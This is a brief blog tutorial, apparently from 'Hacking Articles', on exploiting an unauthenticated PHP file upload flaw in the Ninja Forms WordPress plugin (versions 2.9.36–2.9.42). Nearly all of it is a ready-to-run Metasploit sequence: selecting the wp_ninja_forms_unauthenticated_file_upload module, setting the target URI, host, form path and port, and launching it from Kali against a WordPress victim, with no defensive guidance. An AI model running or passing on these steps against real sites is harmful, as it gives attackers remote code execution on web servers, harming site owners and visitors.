Versions 2.9.36 to 2.9.42 of the Ninja Forms plugin contain an unauthenticated file upload vulnerability, allowing guests to upload arbitrary PHP code that can be executed in the context of the web server.
Exploit Targets
ninja forms 2.9.36
Requirement
Attacker: kali Linux
Victim PC: wordpress
Open Kali terminal type msfconsole
Now type use exploit/unix/webapp/wp_ninja_forms_unauthenticated_file_upload
msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set targeturi /wordpress/
msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set rhost 192.168.0.106 (IP of Remote Host)
msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set form_path /test/
msf exploit (wp_ninja_forms_unauthenticated_file_upload)>set rport 80
msf exploit (wp_ninja_forms_unauthenticated_file_upload)>exploit
The post Hacking WordPress using Ninja Forms Unauthenticated File Upload appeared first on Hacking Articles.